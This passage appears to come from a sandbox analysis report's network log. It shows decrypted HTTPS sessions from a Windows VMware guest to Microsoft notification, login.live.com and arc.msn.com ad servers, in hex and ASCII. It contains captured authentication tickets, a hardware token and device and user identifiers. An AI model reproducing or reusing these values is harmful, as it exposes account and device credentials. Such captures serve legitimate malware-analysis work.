79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 6b 69 6e 67 5c Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"EmptyCreative\",\"propertyManifest\":{},\"properties\":{},\"tracking\

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49711	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:08 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 47 66 68 73 55 79 68 46 6b 36 33 6a 48 74 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 34 62 35 63 66 39 66 39 63 33 38 36 30 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 5GfhsUyhFk63jHti.1Context: e34b5cf9f9c38609
2024-11-23 06:09:08 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-23 06:09:08 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 47 66 68 73 55 79 68 46 6b 36 33 6a 48 74 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 34 62 35 63 66 39 66 39 63 33 38 36 30 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5GfhsUyhFk63jHti.2Context: e34b5cf9f9c38609<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
2024-11-23 06:09:08 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 47 66 68 73 55 79 68 46 6b 36 33 6a 48 74 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 34 62 35 63 66 39 66 39 63 33 38 36 30 39 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: 5GfhsUyhFk63jHti.3Context: e34b5cf9f9c38609
2024-11-23 06:09:09 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-23 06:09:09 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 31 54 4d 6e 47 53 2b 44 33 55 71 73 65 4a 49 4e 4b 6a 64 71 34 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 1TMnGS+D3UqseJINKjdq4w.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49714	20.190.147.12	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:08 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-11-23 06:09:08 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-23 06:09:09 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sat, 23 Nov 2024 06:08:09 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_SN1 x-ms-request-id: 5c571ac6-7676-4b33-a0ca-1184ad09be00 PPServer: PPV: 30 H: SN1PEPF0002FA7F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 23 Nov 2024 06:09:09 GMT Connection: close Content-Length: 11177
2024-11-23 06:09:09 UTC	11177	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49715	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:14 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 56 75 2b 44 30 4b 31 72 45 65 74 78 45 64 47 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 62 37 31 37 39 65 33 65 65 66 61 33 62 37 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: cVu+D0K1rEetxEdG.1Context: 1b7179e3eefa3b7f
2024-11-23 06:09:14 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-23 06:09:14 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 56 75 2b 44 30 4b 31 72 45 65 74 78 45 64 47 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 62 37 31 37 39 65 33 65 65 66 61 33 62 37 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cVu+D0K1rEetxEdG.2Context: 1b7179e3eefa3b7f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
2024-11-23 06:09:14 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 56 75 2b 44 30 4b 31 72 45 65 74 78 45 64 47 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 62 37 31 37 39 65 33 65 65 66 61 33 62 37 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: cVu+D0K1rEetxEdG.3Context: 1b7179e3eefa3b7f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-23 06:09:15 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-23 06:09:15 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 53 79 4e 64 62 6e 62 54 4f 6b 6d 47 73 76 2b 61 37 70 50 34 41 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: SyNdbnbTOkmGsv+a7pP4Ag.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49716	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:14 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 77 68 73 51 4b 39 5a 6d 4d 45 36 6b 30 45 42 50 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 30 64 37 39 61 65 64 38 31 30 66 30 65 66 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: whsQK9ZmME6k0EBP.1Context: 10d79aed810f0ef1
2024-11-23 06:09:14 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-23 06:09:14 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 77 68 73 51 4b 39 5a 6d 4d 45 36 6b 30 45 42 50 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 30 64 37 39 61 65 64 38 31 30 66 30 65 66 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: whsQK9ZmME6k0EBP.2Context: 10d79aed810f0ef1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
2024-11-23 06:09:14 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 77 68 73 51 4b 39 5a 6d 4d 45 36 6b 30 45 42 50 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 30 64 37 39 61 65 64 38 31 30 66 30 65 66 31 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: whsQK9ZmME6k0EBP.3Context: 10d79aed810f0ef1
2024-11-23 06:09:15 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-23 06:09:15 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4c 71 6d 59 4e 4f 35 62 65 6b 4b 52 37 69 47 44 33 37 6e 68 44 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: LqmYNO5bekKR7iGD37nhDg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49719	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:17 UTC	2594	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060913Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=6660103ebd9a4cd3a75221ac8dea0323&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338388&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:17 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 3866 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: gYOEapmMxgw+zNeDnKhCdddrUD+VHDMOhSmfL4J/N/l85zInW6yyxjrCTE+opFACR9kv//q6stegkaUnHM7TJLA1LQXxjsdKBzybzM96Q2ssc94zxR9n3MERxLZ3RnGfa/ro2ftWFyxspdeu9nUYN/BEi7ILueNW3ta72JAQJZwe+rp/EadrvCCXnQGe87iR6NyT4+hpVnQGdGTgKE1DyqtjkbGOFcqVjpkl9kJKQ8izPNxb0kA/0vMTonFWeDqhxiKDVPAWKcE164hTrK9Rg3q00U6XXnt56NbIv4aPhiTYszp52RekY8elfWGLRzkl1tg+J5TOtjCQFutrKJ2LVg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:17 GMT Connection: close
2024-11-23 06:09:17 UTC	3866	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49720	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:17 UTC	2604	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060913Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ec914062d74e4a548a02837a1420fdfa&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-338387&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: 